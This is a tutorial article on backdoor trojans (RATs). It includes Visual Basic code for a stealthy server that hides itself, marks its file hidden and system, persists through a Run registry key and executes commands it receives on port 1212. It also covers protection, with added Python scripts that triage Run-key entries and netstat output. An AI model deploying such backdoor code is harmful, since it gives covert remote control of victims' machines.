About a backdoor

This article gives you basic information about backdoor trojans (often called RATs - Remote Administration Tools): how they work, how people make them,
what they are used for and how to protect yourself from them.
I will provide Visual Basic code here that shows how a backdoor is coded.

1. What backdoors basically are?

Backdoors can be stand-alone executable files, but they can also be parts of worms (MyDoom) or other programs.
The main purpose of a backdoor program is to give a person remote access to the computer or network where the backdoor program is running.
Usually, backdoors run without the user's consent.
Network administrators often use backdoors (usually the commercial and "legal" ones) to control their clients and supervise their actions in a business network.
In schools, backdoors are used by professors who want to prevent students from messing with school computers.

But backdoor software is becoming more and more popular these days among "script-kiddies" and attackers that
want to steal confidential data (credit card info, etc.) and later sell the stolen data.
"Script-kiddies" are usually young, 12-13 year old children that use programs made by someone else to mess with someone's computer, just for fun.
A backdoor program can be written in a wide range of programming languages (I will show you how to write a VB one here), and writing one is simple even for a programmer without much experience.
A program like this can provide almost full, or full, control over the attacked machine, allowing the user to exchange files, change system settings, kill processes, open/close the CD-ROM, turn the monitor on/off, run a proxy and much more than you would think of.

Sub7 was a popular backdoor trojan written by Mobman.
It runs on Windows operating systems and was presented at DefCon in 1999 by its author.
Today almost every anti-virus program or firewall can pick it up, but years ago it was a very popular remote-control program, usually among script-kiddies.
It has a great many functions, from playing tic-tac-toe with the attacked user to running an FTP server on the attacked machine and allowing the hacker to exchange files with that computer.

Let-Me-Rule, or LMR for short, is also a popular RAT with functions similar to Sub7's.
Its author says that the program he wrote is for network administration and not for illegal uses.
However, it was also used by many wannabe hackers for the same purpose Sub7 was used for.

2. How they work?

Direct connection:
Backdoors are usually based on client-server network communication, where the server is the attacked machine
and the client is the attacker. This is more or less a standard.
It is called a direct connection when the client connects directly to the server.
The server application is installed on the computer you want to control and is hidden from the victim.
When the server application is run, it starts listening for incoming connections from the client.
The client application used by the attacker is different from the server: it has a GUI (graphical user interface) that lets the attacker connect to the server remotely by specifying the IP address of the server computer and the port number (1-65535) on which the server application is listening.
If the connection is successful, the client can retrieve information about the server and send commands to it.
The server recognizes the commands and executes a piece of code for each command.
For example, when you send the command "cdopen", the server will open the CD-ROM door.
If the connection attempt fails, either the server isn't running on the remote machine or a firewall/router is blocking access to the port used by the server.

Reverse connection:
This kind of connection between the server and the client became popular when routers did.
The main advantage is that the server (or multiple servers) connects out to a single client; because the connection is started from the server's side, a router or firewall that blocks inbound connections to the server does not get in the way.
Secondly, the client can send a single command to all the servers that are connected (broadcasting).
Data exchange is the same as in direct communication.

3. A backdoor example in Visual Basic

If you already know some basics of the Visual Basic (VB) programming language, it will be useful now, because I'm going to show you how to write a simple backdoor, just to let you see how this works for real.
You will need Microsoft's Visual Studio 6 to write and compile the code.
I will show how to code a simple server application that listens on port 1212 for incoming connections and executes pieces of code when a command is sent from the client.
I won't show you how to make a client application; you will need to figure that out yourself (that's a bit of a challenge).
However, you can control the server using the Telnet client which comes with Windows.

First open a new project (Standard EXE). Click View > Toolbox in the menu to make the
toolbox visible if it's hidden.
Now right-click on the toolbox on your left and select the first option, Components.
A window will pop up. In the first tab ("Components") find an option called "Microsoft Winsock Control 6.0".
Check it and click OK.
You will see an icon that looks like two small monitors in your toolbox. Drag it onto the form.
We've done the preparation. Now we can begin coding our small backdoor.

First lines - hiding the program and modifying the registry
OK, now let's take a look at the code of the form.
Let's add some code to the Form_Load sub:

Dim Startup
If App.PrevInstance = True Then End
Me.Hide

The first line
The second line makes the application run only once, ending if another instance of it is already running.
The third line simply hides the application window. That's quite simple.
If you want to make your application file hidden and marked as a system file, write a line like this:

SetAttr App.Path & "\" & App.EXEName & ".exe", vbHidden + vbSystem

To make sure the server program runs each time Windows is started, type:

Set Startup = CreateObject("WScript.Shell")
Startup.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MyRAT", App.Path & "\" & App.EXEName & ".exe"
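What this persistence step leaves behind, seen from the defender's side: the Run key value and the hidden+system file attribute are exactly the things a startup-list check can look for. The following Python script is an added example and not code from the original article. The sample Run-key entries, paths and attribute values are constructed, the list of "trusted" program directories is an assumption for the demo, and on Windows the `collect_from_windows()` helper reads the real HKLM Run key through the standard winreg module.

```python
"""Triage of Windows Run-key startup entries (added example, not the article's code)."""
import os
import sys

# Win32 file-attribute bits, as returned by GetFileAttributes / os.stat().st_file_attributes.
FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4

# Assumption for the demo: auto-start executables normally live under these directories.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample: three Run-key values as (value name, command string).
SAMPLE_ENTRIES = [
    ("Updater", r'"C:\Program Files\Example\updater.exe" /background'),
    ("MyRAT", r"C:\Users\alice\AppData\Roaming\server.exe"),
    ("OldTool", r"C:\Temp\tool.exe"),
]
# Constructed sample: attribute bits of the files that exist on disk (0x20 = ARCHIVE).
SAMPLE_ATTRIBUTES = {
    r"c:\program files\example\updater.exe": 0x20,
    r"c:\users\alice\appdata\roaming\server.exe": FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM,
}


def executable_path(command):
    """Pull the executable path out of a Run-key command, with or without quotes/arguments."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    idx = command.lower().find(".exe")
    return command[:idx + 4] if idx >= 0 else command.split(" ")[0]


def triage_run_entries(entries, attributes):
    """Return (value name, path, reasons) for every entry that deserves a closer look.

    entries:    iterable of (value name, command) pairs from a Run key
    attributes: mapping of lower-cased path -> attribute bits for files present on disk
    """
    findings = []
    for name, command in entries:
        path = executable_path(command)
        key = path.lower()
        reasons = []
        if not key.startswith(TRUSTED_DIRS):
            reasons.append("executable outside trusted program directories")
        attr = attributes.get(key)
        if attr is None:
            reasons.append("executable not found on disk")
        elif attr & FILE_ATTRIBUTE_HIDDEN and attr & FILE_ATTRIBUTE_SYSTEM:
            reasons.append("file marked hidden+system")
        if reasons:
            findings.append((name, path, reasons))
    return findings


def collect_from_windows():
    """Read the real HKLM Run key and file attributes (Windows only; stdlib winreg module)."""
    import winreg
    entries, attributes = [], {}
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                         r"Software\Microsoft\Windows\CurrentVersion\Run")
    index = 0
    while True:
        try:
            name, data, _ = winreg.EnumValue(key, index)
        except OSError:  # raised once the values are exhausted
            break
        entries.append((name, data))
        path = executable_path(data)
        if os.path.isfile(path):
            attributes[path.lower()] = os.stat(path).st_file_attributes
        index += 1
    return entries, attributes


if __name__ == "__main__":
    if sys.platform == "win32" and "--live" in sys.argv:
        entries, attributes = collect_from_windows()
    else:
        entries, attributes = SAMPLE_ENTRIES, SAMPLE_ATTRIBUTES
    for name, path, reasons in triage_run_entries(entries, attributes):
        print(f"{name}: {path}\n    " + "\n    ".join(reasons))
```

Run without arguments it triages the constructed sample and reports the "MyRAT" value (outside a program directory, hidden+system) and the stale "OldTool" value; with `--live` on Windows it reads the actual Run key. The hidden+system combination on a user-writable path is the signal this article's SetAttr line produces, which is why it is treated as a reason on its own.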

Listen for connections
The following code makes the server's Winsock control listen for incoming connections:

Private Function Start()

Winsock1.Close
Winsock1.LocalPort = 1212
Winsock1.Listen
End Function

You should put this code in a function, as shown above, so you can easily restart the listening if the connection fails or if the client disconnects.
Instead of 1212, you can type any number you want, from 1 to 65535.

Start

Write this into the Form_Load sub, so the program calls the "Start" function you defined above and starts listening when you run it.

Restarting the connection
If the connection breaks, make sure you can easily restart the server's listening.
Otherwise, you could connect only once per program run.
Make a timer called "tmrCheck" and set its interval to approximately 500 milliseconds.

Private Sub tmrCheck_Timer()

On Error Resume Next
' State 8 is sckClosing: the other side has closed the connection
If Winsock1.State = 8 Then
Start
End If
End Sub

This timer checks the connection state every 500 milliseconds, and if the connection is broken it runs the "Start" function again, so the server starts listening again.

Accepting the connection and sending the first message
When you attempt to connect to the server, it would be nice if the server let you do that.
This code makes the server accept incoming connections and send a welcome message to the client once it is connected.

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)

On Error Resume Next
' The control must be closed before it can accept a request
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "You are connected now."
End Sub

You can change the message "You are connected now." to anything you want, and you can add even more actions
to execute when someone tries to connect to the server.

Receiving commands and executing them
I mentioned before that server programs receive commands from the client program, and that is how they decide what to do for each command and which part of the code to execute.
Now I will show you how to do that.
You can add more commands and actions, of course...

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)

Dim Rcv As String
On Error Resume Next
' Retrieve whatever arrived as a string and pick the matching command
Winsock1.GetData Rcv
Select Case Rcv

Case "notepad"
Shell "notepad"

Case "close"
End

Case "msg"
MsgBox "I'm in your computer!", vbCritical, "System Error"

End Select
End Sub

Put your commands in different "cases" as shown in the code above.
That makes it easy for you and for everyone else to read and edit.
In this example, when the server receives the text command "notepad" (which you can send to it via Telnet),
it launches Notepad.
When you send "close" to it, the server application ends.
And when you send "msg", a pop-up message appears.
"Winsock1.GetData Rcv" makes sure everything that is received is handled as a string.

All in all, this is a very simple RAT I showed you here.
You can add more Winsock controls to handle multiple connections, make a client that connects to the server so you don't need the default Telnet client, use better methods for hiding the server, add a reverse connection and an endless number of other things.

4. Protection

Now that you know how they work, it will be easier to protect yourself from backdoors.
Backdoors can get into your system in many ways, including e-mail, remote vulnerabilities and P2P networks, or they can be dropped by another malicious program.
It's good to keep in mind that no computer security is unbreakable and that everything can be disabled or bypassed.
However, you can take some steps to prevent remote attackers from accessing your data and controlling your computer.

Firewall
Many people don't have firewalls installed on their computers, which isn't very surprising.
Why would they have one? They don't know. It slows their computer down, always asks annoying questions and takes up space on the hard disk.
Firewalls are VERY important. You should know that if you're already here.
In short, firewalls control all data that is sent/received through the network you are connected to (Internet, LAN, WAN, etc.) and can easily prevent backdoor attacks.
When a backdoor server application wants to listen, the firewall will prompt you and ask you to give permission or deny it. Of course, I suggest you deny anything unless you really trust the program.
Also, a firewall will prompt you if a backdoor client is trying to remotely access your computer.
It is very useful to be informed about all data exchanged using your computer.
If you use Windows, then I suggest you use the ZoneAlarm firewall (there's a free version) or the Outpost firewall.

Anti-virus
Older backdoor programs will be caught by most anti-virus programs.
However, if you are dealing with a quite new backdoor program, unknown to anti-virus products, the chance of catching it with an anti-virus program is low.
Maybe, if the anti-virus program you are using has advanced heuristic capabilities, it will catch the nasty backdoor.
So anti-virus products can't really help much here...

How to know?
Even if you secured yourself with the methods described above, you can still be unsure about your protection.
If your network activity is high, or higher than expected, while you're not doing anything on the network, then a backdoor server might be exchanging data with its client.
You can also check for open connections and ports by running "cmd" and typing "netstat -a".
This shows you a list where you can see who is connected to your computer, on which port and through which protocol.
Check your process list and startup list for strange names that are similar to the names of registered parts of the operating system.
Then check the process names using Google and see if the process belongs to a backdoor program.
Use a port scanner to scan your own IP for open ports, so you can notice if a program opened ports without your approval.
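The "netstat -a" check above, worked through in an added Python example that is not code from the original article. It parses netstat output and flags both connection models from section 2: an unexpected listening port (a direct-connection server waiting for its client, plus any session that has already arrived on it) and an unexpected outbound session (a reverse-connection server that called out to its client). The sample output, the two expected-port sets and the `--live` option that runs the real `netstat -an` are constructed or assumed for the demo; the parser assumes the Windows column layout.

```python
"""Triage of "netstat -a" output for backdoor connection patterns (added example, not the article's code)."""
import re
import subprocess
import sys

# Constructed sample in the layout Windows' netstat prints. Remote addresses are
# documentation ranges; port 1212 is the port the article's server listens on.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1212           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1212      203.0.113.5:51234      ESTABLISHED
  TCP    192.168.1.10:49721     198.51.100.7:7777      ESTABLISHED
  TCP    192.168.1.10:49730     93.184.216.34:443      ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""

# Assumptions for the demo: which listening ports this host should have, and which
# remote ports its own outbound connections normally go to.
EXPECTED_LISTEN = {135, 137, 445}
EXPECTED_REMOTE = {53, 80, 443}

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s*(\S+)?\s*$")


def parse_netstat(text):
    """One dict per connection line; headers and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, laddr, lport, raddr, rport, state = m.groups()
        rows.append({
            "proto": proto,
            "local": (laddr, None if lport == "*" else int(lport)),
            "remote": (raddr, None if rport == "*" else int(rport)),
            "state": state or "",
        })
    return rows


def triage(rows, expected_listen=EXPECTED_LISTEN, expected_remote=EXPECTED_REMOTE):
    """Flag the two patterns from the article: a server waiting for its client
    (unexpected LISTENING port, plus any session that arrived on it) and a server
    that connected out to its client (ESTABLISHED to an unusual remote port)."""
    listening = {r["local"][1] for r in rows if r["state"] == "LISTENING"}
    findings = []
    for r in rows:
        lport, rport = r["local"][1], r["remote"][1]
        if r["state"] == "LISTENING":
            if lport not in expected_listen:
                findings.append(("unexpected listener", r))
        elif r["state"] == "ESTABLISHED":
            if lport in listening:
                # Session arrived on one of our own listening ports (inbound)
                if lport not in expected_listen:
                    findings.append(("inbound session to unexpected listener", r))
            elif rport not in expected_remote:
                # Ephemeral local port, so this host initiated the connection (outbound)
                findings.append(("outbound session to unusual remote port", r))
    return findings


def describe(finding):
    """Human-readable one-liner for a finding."""
    kind, r = finding
    return "%s: %s %s:%s <-> %s:%s %s" % (kind, r["proto"], r["local"][0], r["local"][1],
                                          r["remote"][0], r["remote"][1], r["state"])


if __name__ == "__main__":
    if "--live" in sys.argv:
        # Real output; "-n" keeps addresses numeric so the regex above applies
        text = subprocess.run(["netstat", "-an"], capture_output=True, text=True).stdout
    else:
        text = SAMPLE_NETSTAT
    for f in triage(parse_netstat(text)):
        print(describe(f))
```

On the sample this reports three lines: the listener on 1212, the established session that arrived on it, and the outbound session to port 7777. The inbound/outbound split is decided by whether the local port of an ESTABLISHED row is also a LISTENING port on the same host, which is what distinguishes the direct-connection model from the reverse-connection one in plain netstat output.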

 

The article has reached its end now.
I hope you enjoyed reading this article, learned some basics of backdoor programs and understood how they work.
I tried to keep the article as short as possible,
so as not to lose your attention or stray from the main idea of this article.

Used sources:
en.wikipedia.org
www.google.com
www.governmentsecurity.org

Article by Feky